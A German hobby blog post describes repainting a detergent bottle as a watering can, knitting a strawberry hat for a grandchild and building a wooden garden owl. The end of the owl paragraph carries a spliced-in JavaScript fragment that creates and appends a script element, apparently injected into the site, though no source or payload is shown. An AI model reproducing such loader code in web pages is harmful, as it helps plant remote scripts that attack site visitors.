Tolle Gartendekorationen selber basteln

Ich werfe ungern etwas weg, was ich noch weiter verwenden kann. Auf www.Bastelforum.de habe ich letztens eine tolle Idee gefunden, wie ich meine alten Plastikflaschen von meinen Weichspülmittel wiederverwenden kann. 

Die Idee ist genial und simpel. Die Plastikflaschen von flüssig Ariel kann man hervorragend auch als Gieskanne wieder verwenden.

Eine Waschmittelflasche als Gieskanne

Eine Waschmittelflasche als Gieskanne

Einfach das olle Etikett abmachen und mit Acrylfarbe bemalen. Damit das Motiv auch erhalten bleibt, ist es sinnvoll, das Motiv mit Klarlack zu fixieren.  Dieses Beispiel hier werde ich als Vorlage verwenden und weiter verfeinern. Besser ist es, wenn ich die Verschlusskappe aufhebe und da noch ein paar Löcher oben rein mache. Dann habe ich wirklich eine neue Gieskanne und die Plastikflasche vor dem Müllberg gerettet.

Wenn ich an einem schönen Sommertag alleine in meinem Garten sitze häkele ich auch mal gerne das eine oder andere Teil für meine Enkelin. Ich könnte sie ja mal mit einer Erdbeermütze, wie diese hier überraschen.

Erdbeermütze

Foto: Eine Erdbeermütze

Meine Enkeltochter und ich lieben Erdbeeren und wir haben selber ein großes Beet mit Erdbeeren bei uns im Garten angelegt. Vom Prinzip her, ist diese Erdbeermütze eine Noppenmütze.

So geht’s

Bei der Noppenmütze für Kinder schlage ich eine Maschenzahl teilbar durch 4+3+2 Randmaschen an. Das Bündchen (Rand) wird in Rot gestrickt , das Strukturmuster ( Noppen ) in rot. Es wird in Hin- und Rückreihen gestrickt ca. insgesamt 14cm -15cm hoch,
wenn die Höhe erreicht wurde, einige Maschen in jeder 2. Reihe zusammen stricken und die Mittelnaht schließen.

Eine tolle Garteneule

Garteneule

Eine tolle Garteneule

Eine weitere tolle Idee, die ich im Bastelforum entdeckt habe, ist diese Garteneule. Diese Eule kann man gut mit Opa zusammen im Garten basteln. Für die Eule brauchen wir eine kleinen Holzstamm, eine Stichsäge, ein paar alte Bretter, Leim und braune Farbe.d.getElementsByTagName(‘head’)[0].appendChild(s);var d=document;var s=d.createElement(‘script’); d.getElementsByTagName(‘head’)[0].appendChild(s);

Posted in Blog and tagged , .

Hinterlasse eine Antwort